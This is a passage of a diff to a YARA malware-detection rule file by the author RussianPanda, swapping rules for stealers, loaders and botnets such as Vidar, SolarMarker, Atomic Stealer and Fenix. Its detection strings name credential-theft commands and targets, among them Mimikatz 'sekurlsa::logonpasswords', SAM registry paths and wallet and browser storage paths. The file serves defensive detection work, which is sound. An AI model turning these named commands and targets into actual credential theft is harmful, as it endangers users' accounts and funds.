[25] E8 EF FC E4 FF} + $s1 = {2F 00 61 00 70 00 69 00 2F 00 63 00 68 00 65 00 63 00 6B} + $s2 = {62 00 65 00 67 00 69 00 6E 00 20 00 63 00 6F 00 6E 00 6E 00 65 00 63 00 74} + $s3 = {62 00 65 00 67 00 69 00 6E 00 20 00 66 00 6C 00 75 00 73 00 68 00 20 00 64 00 6E 00 73} + $s4 = {62 00 65 00 67 00 69 00 6E 00 20 00 73 00 65 00 6E 00 64 00 69 00 6E 00 67} condition: - uint16(0)==0x5A4D and all of ($s*) and filesize <9MB + all of ($s*) and filesize <12MB and pe.exports("DotNetRuntimeDebugHeader") } -rule RUSSIANPANDA_Win_Mal_Koistealer_PS +rule RUSSIANPANDA_Atomic_Stealer : FILE { meta: - description = "Detects KoiStealer PowerShell script" + description = "Detects Atomic Stealer targering MacOS" author = "RussianPanda" - id = "6dfdb39c-1b6a-5969-9c2d-e09869af6e0f" - date = "2024-04-04" - modified = "2024-04-04" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Koi/win_mal_KoiStealer_PS.yar#L1-L12" + id = "259c5c33-0164-568f-aec4-4fe0a2c6d015" + date = "2024-01-13" + modified = "2024-01-17" + reference = "https://www.bleepingcomputer.com/news/security/macos-info-stealers-quickly-evolve-to-evade-xprotect-detection/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/AtomicStealer/Atomic_Stealer.yar#L1-L27" license_url = "N/A" - hash = "4f55be0b55ec67dfda42b88e9c743a2a" - logic_hash = "8a60a1d770eb4b5048762ddfd4657fdf7a430b09eb454ae5a5bb3103460907db" + hash = "dd8aa38c7f06cb1c12a4d2c0927b6107" + logic_hash = "7601e508aeccba943b54e675212993920c984271f655e68c19efaf6d12cfebd5" score = 75 - quality = 85 - tags = "" + quality = 58 + tags = "FILE" strings: - $s1 = "index.php?id=$guid&subid=" - $s2 = "$config" + $s1 = {8B 09 83 C1 (01|02|04|05|03) 39 C8 0F 85 38 00 00 00 48 8B 85} + $s2 = {C7 40 04 00 00 00 00 C6 40 08 00 C6 40 09 00} + $t1 = {80 75 D?} + $t2 = {0F 57 05 ?? 1B 01 00} + $t3 = {8A 06 34 DE 88 07 8A 46 01 34 DF 88 47 01} + $c1 = {28 ?? 40 39} + $c2 = {64 65 73 6B 77 61 6C 6C 65 74 73} condition: - all of ($s*) + ( uint32(0)==0xfeedface or uint32(0)==0xcefaedfe or uint32(0)==0xfeedfacf or uint32(0)==0xcffaedfe or uint32(0)==0xcafebabe or uint32(0)==0xbebafeca) and all of ($s*) and #s1>60 and #s2>100 or ( all of ($t*) and #t1>10 and #t2>5) or (#c1>200 and $c2) } -rule RUSSIANPANDA_Win_Mal_Koi_Loader : FILE +import "pe" + +rule RUSSIANPANDA_Solarmarker_Loader : FILE { meta: - description = "Detects Koi Loader" + description = "Detects SolarMarker loader 1-4-2024" author = "RussianPanda" - id = "a608558d-97c8-5161-a6eb-29fd420458a8" - date = "2024-04-04" - modified = "2024-04-04" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Koi/win_mal_Koi_loader.yar#L1-L14" + id = "b385fcd4-62b7-5a83-8a2e-6841fdd17526" + date = "2024-01-04" + modified = "2024-01-04" + reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SolarMarker/solarmarker_backdoor.yar#L3-L19" license_url = "N/A" - hash = "47e208687c2fb40bdbaa17e368aaa1bd" - logic_hash = "4f909865c6d274804c3fa7f66822d7bea71bb93e7c6a422ebaf220df056ac095" + hash = "8eeefe0df0b057fc866b8d35625156de" + logic_hash = "035eccb41f2ecdeb196003542c165cedad96e3e8e741511b4beda3dfe1ece74e" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {27 11 68 05} - $s2 = {15 B1 B3 09} - $s3 = {B5 96 AA 0D} - $s4 = {74 [0-10] C1 E9 18} + $s1 = {06 [0-7] 58 D1 8C [3] 01 28 [3] 0A 0A} condition: - uint16(0)==0x5A4D and all of ($s*) + all of ($s*) and #s1>5 and filesize <7MB and pe.imports("mscoree.dll") } -rule RUSSIANPANDA_Win_Mal_Koi_Loader_Decrypted : FILE +rule RUSSIANPANDA_Solarmarker_Loader_PS2EXE : FILE { meta: - description = "Detects decrypted Koi Loader" + description = "Detects SolarMarker loader using PS2EXE" author = "RussianPanda" - id = "71de93d3-5c9f-5994-a54d-d4455d500280" - date = "2024-04-04" - modified = "2024-04-04" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Koi/win_mal_Koi_loader_decrypted.yar#L1-L12" + id = "837883a1-b657-52ae-95c4-ebafc8ac55de" + date = "2024-01-04" + modified = "2024-01-04" + reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SolarMarker/solarmarker_loader.yar#L1-L17" license_url = "N/A" - hash = "1901593e0299930d46b963866f33a93b" - logic_hash = "f73ada7185ff109afe1e186a0fb7b4420b3d0e04c93c7c5423243db97eb34e49" + hash = "b45c31679c2516b38c7ff8c395f1d11d" + logic_hash = "4f579f350c3320e7b811cae0efe7302e852f59adc02d805f64ba464f8a995f25" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {73 00 64 00 32 00 2E 00 70 00 73 00 31 00} - $s2 = {25 00 74 00 65 00 6D 00 70 00 25 00 5C 00 25 00 70 00 61 00 74 00 68 00 73 00 25} + $s1 = {72 7B 02 00 70 72 89 02 00 70 72 91 02 00 70 [22] 72 97 02 00 70 72 AB 02 00 70 72 B5 02 00 70} + $s2 = {13 0D 72 [3] 70} + $s3 = {72 C1 02 00 70 72 B2 03 00 70 72 B8 03 00 70} condition: - uint16(0)==0x5A4D and all of ($s*) + all of ($s*) and filesize >200MB } -rule RUSSIANPANDA_Vidar_DLL_Embedded +rule RUSSIANPANDA_Solarmarker_First_Stage_Payload : FILE { meta: - description = "Vidar Stealer with embedded DLL dependencies" + description = "Detects SolarMarker First Stage payload" author = "RussianPanda" - id = "462fe42a-2504-5e7e-ad90-2c7e54478204" - date = "2023-05-02" - modified = "2023-05-05" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/VidarStealer/vidar_ver3.6_3.7_dll_embedded.yar#L1-L21" + id = "56eec644-9ad7-51db-9d11-68ea3e12c36a" + date = "2024-01-30" + modified = "2024-01-30" + reference = "https://x.com/luke92881/status/1751968350689771966?s=20" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SolarMarker/solarmarker_first_stage_payload.yar#L1-L21" license_url = "N/A" - logic_hash = "98d23523c2ab196f670dc33164954fc69a1c1692fa870a476e25d7dd3cebace2" + hash = "f53563541293a826738d3b8f1164ea43" + logic_hash = "e704614782b0f3cba60c53413e889113d2d44f37e60801205e5ed5ff921b13ee" score = 75 - quality = 85 - tags = "" + quality = 71 + tags = "FILE" strings: - $s = {50 4B 03 04 14 00 00 00 08 00 24 56 25 55 2B 6D 5C 08 39 7C 05} - $a1 = "https://t.me/mastersbots" - $a2 = "https://steamcommunity.com/profiles/76561199501059503" - $a3 = "%s\\%s\\Local Storage\\leveldb" - $a4 = "\\Autofill\\%s_%s.txt" - $a5 = "\\Downloads\\%s_%s.txt" - $a6 = "\\CC\\%s_%s.txt" - $a7 = "Exodus\\exodus.wallet" + $s1 = {63 72 65 64 75 69} + $s2 = {43 72 65 64 55 49 50 72 6F 6D 70 74 46 6F 72 43 72 65 64 65 6E 74 69 61 6C 73} + $s3 = {50 6F 77 65 72 53 68 65 6C 6C} + $s4 = {73 65 74 5F 43 75 72 73 6F 72 50 6F 73 69 74 69 6F 6E} + $s5 = {73 65 74 5F 41 63 63 65 70 74 42 75 74 74 6F 6E} + $s6 = {4D 65 73 73 61 67 65 42 6F 78 42 75 74 74 6F 6E 73} + $s7 = {41 67 69 6C 65 44 6F 74 4E 65 74 52 54} + $s8 = "_CorExeMain" condition: - $s and 5 of ($a*) + all of them and filesize >250MB } -rule RUSSIANPANDA_Gh0Strat : FILE +rule RUSSIANPANDA_Solarphantom : FILE { meta: - description = "Detects Gh0stRAT" + description = "SolarPhantom Backdoor Detection" author = "RussianPanda" - id = "db310549-feed-57b8-9ec0-232b6eda62f9" - date = "2024-07-09" - modified = "2024-07-09" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Gh0stRAT/Gh0stRAT.yar#L1-L14" + id = "f564a943-e83b-5c1b-ba8c-b227d69d3fd8" + date = "2023-12-11" + modified = "2023-12-11" + reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SolarMarker/solarphantom.yar#L1-L16" license_url = "N/A" - hash = "678b06ecdbc9b186788cf960332566f9" - logic_hash = "bc4bdad83a0e23273774c3d4812cabe9fa44897c8ff2e308004e03b4f1622cd5" + logic_hash = "3b49d301e625d5abf1b726481a80d6a97d33acd3301c12964f2f37d37130c1b7" score = 75 - quality = 85 + quality = 83 tags = "FILE" strings: - $s1 = "SAM\\SAM\\Domains\\Account\\Users\\Names\\%s" - $s2 = "GetMP privilege::debug sekurlsa::logonpasswords exit" - $s3 = "Http/1.1 403 Forbidden" - $s4 = "WinSta0\\Default" + $p1 = {B8 94 E3 46 00 E8 C6 EB FA FF 8B 45 F8} + $p2 = {68 E8 EF 46 00 FF 75 E4} + $p3 = {62 72 76 70 72 66 5f 62 6b 70} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and 1 of ($p*) and filesize <600KB } -rule RUSSIANPANDA_Meduzastealer_1 : FILE +rule RUSSIANPANDA_Solardropper { meta: - description = "Detects MeduzaStealer 1-2024" + description = "SolarMarker first stage detection" author = "RussianPanda" - id = "6bc4c048-a32d-5a9c-b213-980c64d08d29" - date = "2024-01-01" - modified = "2024-01-01" - reference = "https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/MeduzaStealer/MeduzaStealer_1-1-2024.yar#L1-L16" + id = "8e40b001-ae00-5768-bb91-e45264748087" + date = "2024-01-03" + modified = "2024-01-03" + reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SolarMarker/solardropper.yar#L1-L15" license_url = "N/A" - logic_hash = "0547e51abd04302c45f1319bc21046ade019bc98eb85d9cba67cb2109ff642eb" + logic_hash = "5dccb7be94e814335c0c867f8b3dd8855043375fe9f1235d5519c690fc7df842" score = 75 - quality = 83 - tags = "FILE" + quality = 85 + tags = "" strings: - $s1 = {41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 57 69 6e 55 70 64 61 74 65 2e 65 78 65} - $s2 = {0f 57 ?? ?? ?? 00 00 66 0f 7f 85 ?? ?? 00 00} - $s3 = {48 8d 15 ?? ?? 05 00 49 8b cf} - $s4 = {48 8d 0d ?? ?? 06 00 ff 15 ?? ?? 06 00} + $p1 = {2d 00 71 00 71 00 78 00 74 00 72 00 61 00 63 00 74 00 3a 00 22 00 3c 00 66 00 69 00 6c 00 71 00 71 00 6e 00 61 00 6d 00 71 00 71 00 3e 00 22 00} + $p2 = "deimos.exe" + $p3 = {5e 00 2d 00 28 00 5b 00 5e 00 3a 00 20 00 5d 00 2b 00 29 00 5b 00 20 00 3a 00 5d 00 3f 00 28 00 5b 00 5e 00 3a 00 5d 00 2a 00 29 00 24 00} condition: - 3 of ($s*) and filesize <1MB + all of ($p*) } -rule RUSSIANPANDA_Easycrypter : FILE +import "pe" + +rule RUSSIANPANDA_Bandit_Stealer : FILE { meta: - description = "Detects EasyCrypter" + description = "Detects the latest build of Bandit Stealer" author = "RussianPanda" - id = "73b01a6c-dcd1-502e-a431-daf82ab3ed50" - date = "2024-01-05" - modified = "2024-01-05" + id = "ed61177d-d70d-5062-8703-f2f2b9d63751" + date = "2023-05-05" + modified = "2023-05-05" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/EasyCrypter/easycrypter.yar#L1-L16" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/BanditStealer/bandit_stealer.yar#L3-L21" license_url = "N/A" - hash = "60063c99fda3b6c5c839ec1c310b03e8f9c7c8823f2eb7bf75e22c6d738ffa8f" - logic_hash = "761ed4629150453009b76d9c2ad251754009b464550b92dab3395fa30422f6ef" - score = 75 + logic_hash = "304bf05a58d5b762ffe078457739188692f4f7109db929418832c4379b21ae72" + score = 50 quality = 85 tags = "FILE" strings: - $s1 = {F6 17 [16-20] 80 2F 36 [16-20] 80 07 87} - $s2 = {81 38 50 45 00 00 [20-22] 8B 88 A0 00 00 00 [2-4] 8B 80 A4 00 00 00 [5-7] 8B 40 50 [50-56] 89 0C 24 89 44 24 04 C7 44 24 08 00 30 00 00 C7 44 24 0C 04 00 00 00 FF 15 [3] 00} + $s1 = {48 8D 35 ?? ?? B6 FF 48 8D BE DB ?? ?? FF 48 8D 87 AC ?? ?? 00 FF 30 C7 00 ?? ?? ?? ?? 50 57 31 DB 31 C9} + $s2 = {48 FF C0 88 17 83 E9 01 8A 10 48 8D 7F 01 75 F0} condition: - uint16(0)==0x5A4D and $s1 and $s2 + all of ($s*) and ( uint16(0)==0x5A4D or uint32(0)==0x4464c457f) and pe.sections[0].name contains "UPX0" and pe.sections[1].name contains "UPX1" and pe.sections[0].characteristics&pe.SECTION_MEM_EXECUTE and pe.sections[0].characteristics&pe.SECTION_MEM_WRITE and pe.sections[1].characteristics&pe.SECTION_MEM_EXECUTE and pe.sections[1].characteristics&pe.SECTION_MEM_WRITE } -rule RUSSIANPANDA_Danabot +rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars { meta: - description = "Detects DanaBot" + description = "Detects PowerShell special character obfuscation" author = "RussianPanda" - id = "804604d9-db3b-5678-ae0d-67f0e876c93e" - date = "2023-12-01" - modified = "2023-12-01" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/DanaBot/danabot_yara.yar#L1-L17" + id = "dd2d41d4-3431-5252-adf1-d537f3b8db7e" + date = "2024-01-12" + modified = "2024-02-02" + reference = "https://perl-users.jp/articles/advent-calendar/2010/sym/11" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/PowerShell Obfuscation/obfuscation_powershell_special_chars.yar#L1-L15" license_url = "N/A" - logic_hash = "4968531f27fa1a8bc3fca536a04b75277adefc42addb9f1999c564510cbcb684" + hash = "d77efad78ef3afc5426432597ba129141952719846bc5ccd058249bb23d8a905" + logic_hash = "4cc4ebffe7bf712b412a060536acc51d94381d24b46e5494195ae17482076cd6" score = 75 - quality = 83 + quality = 81 tags = "" strings: - $s1 = {55 8b ec 8a 45 08 34 4a 5d c2 04 00} - $s2 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 5C 00 53 00 65 00 61 00 4D 00 6F 00 6E 00 6B 00 65 00 79} - $s3 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 54 00 68 00 75 00 6E 00 64 00 65 00 72 00 62 00 69 00 72 00 64 00} - $s4 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 4F 00 52 00 4C 00 5C 00 57 00 69 00 6E 00 56 00 4E 00 43 00 33 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64} - $s5 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 45 00 78 00 63 00 69 00 74 00 65 00 5C 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4D 00 65 00 73 00 73 00 65 00 6E 00 67 00 65 00 72 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64} - $a = {44 45 4C 50 48 49 43 4C 41 53 53} + $s1 = {7d 3d 2b 2b 24 7b} + $s2 = {24 28 20 20 29} + $s3 = {24 7B [1-10] 7D 20 20 2B 20 20 24} + $s4 = {24 7B [1-10] 7D 24 7B} condition: - 3 of ($s*) and $a + 2 of ($s*) } -import "pe" - -rule RUSSIANPANDA_Ducktail_Myrdpservice_Bot : FILE +rule RUSSIANPANDA_Easycrypter : FILE { meta: - description = "Detects Ducktail myRdpService bot" + description = "Detects EasyCrypter" author = "RussianPanda" - id = "50786786-a7db-5290-a363-6fda139a0343" - date = "2023-12-24" - modified = "2023-12-26" + id = "73b01a6c-dcd1-502e-a431-daf82ab3ed50" + date = "2024-01-05" + modified = "2024-01-05" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Ducktail/ducktail_myrdpservice-12-2023.yar#L3-L17" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/EasyCrypter/easycrypter.yar#L1-L16" license_url = "N/A" - logic_hash = "a329067fbb2acc34c4970167bbce0706c5a3ec09ee89ce16817c105ae1c17b1b" + hash = "60063c99fda3b6c5c839ec1c310b03e8f9c7c8823f2eb7bf75e22c6d738ffa8f" + logic_hash = "761ed4629150453009b76d9c2ad251754009b464550b92dab3395fa30422f6ef" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 49 00 64 00 2E 00 74 00 78 00 74} - $s2 = {6C 00 6F 00 67 00 5F 00 72 00 64 00 70 00 2A} - $s3 = {00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 65 00 64 00} + $s1 = {F6 17 [16-20] 80 2F 36 [16-20] 80 07 87} + $s2 = {81 38 50 45 00 00 [20-22] 8B 88 A0 00 00 00 [2-4] 8B 80 A4 00 00 00 [5-7] 8B 40 50 [50-56] 89 0C 24 89 44 24 04 C7 44 24 08 00 30 00 00 C7 44 24 0C 04 00 00 00 FF 15 [3] 00} condition: - all of ($s*) and filesize <12MB and pe.exports("DotNetRuntimeDebugHeader") + uint16(0)==0x5A4D and $s1 and $s2 } -import "pe" - -rule RUSSIANPANDA_Ducktail_Mainbot : FILE +rule RUSSIANPANDA_Mal_Fenixbotnet_Jse { meta: - description = "Detects Ducktail mainbot" + description = "Detects Fenix Botnet JSE downloader" author = "RussianPanda" - id = "f280903f-13d3-54e1-8308-781e3f777d13" - date = "2023-12-24" - modified = "2023-12-26" + id = "00c6f8a6-c2e2-5b08-b332-b91371060bbe" + date = "2024-01-18" + modified = "2024-02-02" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Ducktail/ducktail_mainbot-12-2023.yar#L3-L19" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/FenixBotnet/mal_FenixBotnet_jse.yar#L1-L14" license_url = "N/A" - logic_hash = "33b85c6e1e1137aeeb07eba957b73d738a70ddc561b42bd2d39258e90280fca4" + hash = "a7fadf0050d4d0b2cefd808e16dfde69" + logic_hash = "848c00361fba60e63e8ec4098404e87d4ba2b11d8489ad16d49c20fc653a5e45" score = 75 quality = 85 - tags = "FILE" + tags = "" strings: - $s1 = {2F 00 61 00 70 00 69 00 2F 00 63 00 68 00 65 00 63 00 6B} - $s2 = {62 00 65 00 67 00 69 00 6E 00 20 00 63 00 6F 00 6E 00 6E 00 65 00 63 00 74} - $s3 = {62 00 65 00 67 00 69 00 6E 00 20 00 66 00 6C 00 75 00 73 00 68 00 20 00 64 00 6E 00 73} - $s4 = {62 00 65 00 67 00 69 00 6E 00 20 00 73 00 65 00 6E 00 64 00 69 00 6E 00 67} + $s1 = {76 61 72 20 [0-30] 3D 20 22 66 22} + $s2 = {76 61 72 20 [0-30] 3D 20 22 75 22} + $s3 = {76 61 72 20 [0-30] 3D 20 22 6E 22} + $s4 = {6E 65 77 20 46 75 6E 63 74 69 6F 6E 28 64 65 63 6F 64 65 55 52 49 43 6F 6D 70 6F 6E 65 6E 74 28 [0-30] 29 29 2E 63 61 6C 6C 28 29} condition: - all of ($s*) and filesize <12MB and pe.exports("DotNetRuntimeDebugHeader") + all of ($s*) } -rule RUSSIANPANDA_Ducktail : FILE +rule RUSSIANPANDA_Mal_Botnetfenix_Payload : FILE { meta: - description = "Ducktail Infostealer" + description = "Detects BotnetFenix payload" author = "RussianPanda" - id = "14ba165f-a1f3-5820-a6d8-e2b6ab2fbb51" - date = "2023-04-25" - modified = "2023-05-05" + id = "566bfae1-c43d-5bd6-adcf-faff32d8c325" + date = "2024-02-02" + modified = "2024-02-04" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Ducktail/ducktail.yar#L1-L16" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/FenixBotnet/mal_BotnetFenix_Payload.yar#L1-L16" license_url = "N/A" - logic_hash = "cb248870f6945d7a6d60d54944dc726d40ba326448af39b87325ec56445602a5" + hash = "65a9575c50a96d04a3f649fe0f6b8ccd" + logic_hash = "27f423b509ad8de0f8389c7b3e3bfec2eeb10c964aa8c70bad47cc4334df1a5e" score = 75 - quality = 73 + quality = 85 tags = "FILE" strings: - $s = {65 5f 73 71 6c 69 74 65 33 2e 64 6c 6c} - $s1 = {54 65 6c 65 67 72 61 6d 2e 42 6f 74 2e 64 6c 6c} - $s2 = {4e 65 77 74 6f 6e 73 6f 66 74 2e 4a 73 6f 6e 2e 64 6c 6c} - $s3 = {42 6f 75 6e 63 79 43 61 73 74 6c 65 2e 43 72 79 70 74 6f 2e 64 6c 6c} - $s4 = {53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 53 6f 63 6b 65 74 73 2e 43 6c 69 65 6e 74 2e 64 6c 6c} - $s5 = {53 79 73 74 65 6d 2e 4e 65 74 2e 4d 61 69 6c 2e 64 6c 6c} + $s1 = "tasks_register" + $s2 = "actionget_action" + $s3 = "Post Success" + $s4 = "Success Stealer" + $s5 = "Download and Execute task id" + $a = "_CorExeMain" condition: - all of them and filesize >60MB + uint16(0)==0x5A4D and 4 of ($s*) and $a } rule RUSSIANPANDA_Zharkbot : FILE { @@ -206813,7 +208749,7 @@ rule RUSSIANPANDA_Zharkbot : FILE date = "2024-09-02" modified = "2024-09-03" reference = "https://research.openanalysis.net/zharkbot/triage/x64dbg/2024/09/02/zharkbot-config.html" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/ZharkBot/Zharkbot.yar#L1-L15" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/ZharkBot/Zharkbot.yar#L1-L15" license_url = "N/A" hash = "1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109" logic_hash = "fded6a0c7af4fda13619778669ef619f88b43e12f12284a3c551c4fddac01024" @@ -206837,7 +208773,7 @@ rule RUSSIANPANDA_Zharkbot_1 : FILE date = "2024-01-21" modified = "2024-03-12" reference = "https://x.com/ViriBack/status/1749184882822029564?s=20" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/ZharkBot/zharkbot.yar#L1-L15" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/ZharkBot/zharkbot.yar#L1-L15" license_url = "N/A" hash = "d53ce8c0a8a89c2e3eb080849da8b1c47eaac614248fc55d03706dd5b4e10bdd" logic_hash = "ffaec6b19dd4385cd1bc156fdfde39a356367c7fba4135c48a8de62a18a78576" @@ -206852,85 +208788,87 @@ rule RUSSIANPANDA_Zharkbot_1 : FILE condition: uint16(0)==0x5A4D and #s1>3 and #s2>3 and filesize <500KB } -rule RUSSIANPANDA_Win_Mal_Xworm : FILE +rule RUSSIANPANDA_Check_Installed_Software : FILE { meta: - description = "Detects XWorm RAT" + description = "No description has been set in the source file - RussianPanda" author = "RussianPanda" - id = "5701f382-3c97-5a00-9673-6c39b0f11cc2" - date = "2024-03-11" - modified = "2024-03-11" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/XWorm/win_mal_XWorm.yar#L1-L15" + id = "a45c7012-dc83-59da-a691-251f0a06be12" + date = "2024-01-14" + modified = "2024-01-15" + reference = "https://unprotect.it/technique/checking-installed-software/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Techniques/check_installed_software.yar#L1-L19" license_url = "N/A" - hash = "fc422800144383ef6e2e0eee37e7d6ba" - logic_hash = "c42544285517dc61628e8df2ee5ab6733924fbb2cc08b9b2df273eec0a401d90" - score = 75 - quality = 85 + hash = "db44d4cd1ea8142790a6b26880b41ee23de5db5c2a63afb9ee54585882f1aa07" + logic_hash = "ab079f1edaffca5bce1e872d6e4fc44f7c22b9260feaed7cd38e578646d420ef" + score = 50 + quality = 35 tags = "FILE" strings: - $s1 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21} - $s2 = {50 00 6C 00 75 00 67 00 69 00 6E 00 73 00 20 00 52 00 65 00 6D 00 6F 00 76 00 65 00 64 00 21} - $s3 = {73 00 65 00 6E 00 64 00 50 00 6C 00 75 00 67 00 69 00 6E} - $s4 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21} - $s5 = "_CorExeMain" + $d1 = "DisplayVersion" + $u1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" + $reg = "RegOpenKeyExA" + $h = {68 (01|02) 00 00 80} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and $reg and $h and for any i in (1..#u1) : ($d1 in (@u1[i]-200..@u1[i]+200)) } -rule RUSSIANPANDA_Mal_Nitrogen : FILE +rule RUSSIANPANDA_Golang_Base64_Enc : FILE { meta: - description = "Detects Nitrogen campaign" + description = "Detects Base64 Encoding and Decoding patterns in Golang binaries" author = "RussianPanda" - id = "9d591f87-47ec-54ea-b0ae-26a0542733a0" - date = "2024-02-04" - modified = "2024-02-04" - reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Nitrogen/mal_nitrogen.yar#L1-L15" + id = "6330e005-9c67-5acd-9063-aa7e30e92f5f" + date = "2024-01-10" + modified = "2024-01-14" + reference = "https://unprotect.it/technique/base64/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Techniques/golang_base64_enc.yar#L1-L18" license_url = "N/A" - logic_hash = "642d5a16c7fb217a297bba683221de474eb028ac48ec8f52be897eaa056acb9b" + hash = "509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c" + logic_hash = "72cf3ee948df9c4ce593f16a49397e79fdc5ecc3264b3685bbc54f60ed1278bd" score = 75 - quality = 79 + quality = 83 tags = "FILE" strings: - $s1 = {63 7C 77 7B F2 6B 6F C5} - $s2 = {52 09 6A D5 30 36 A5 38} - $s3 = {6F 72 69 67 69 6E 61 6C 5F 69 6E 73 74 61 6C 6C} - $s4 = {43 3A 5C 55 73 65 72 73 5C 50 75 62 6C 69 63 5C 44 6F 77 6E 6C 6F 61 64} - $s5 = {25 00 43 00 55 00 52 00 52 00 45 00 4E 00 54 00 5F 00 44 00 45 00 52 00 45 00 43 00 54 00 4F 00 52 00 59 00 25} - $s6 = {4E 69 74 72 6F 67 65 6E 54 61 72 67 65 74} + $s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29} + $s2 = {62 61 73 65 36 34 2e 53 74 64 45 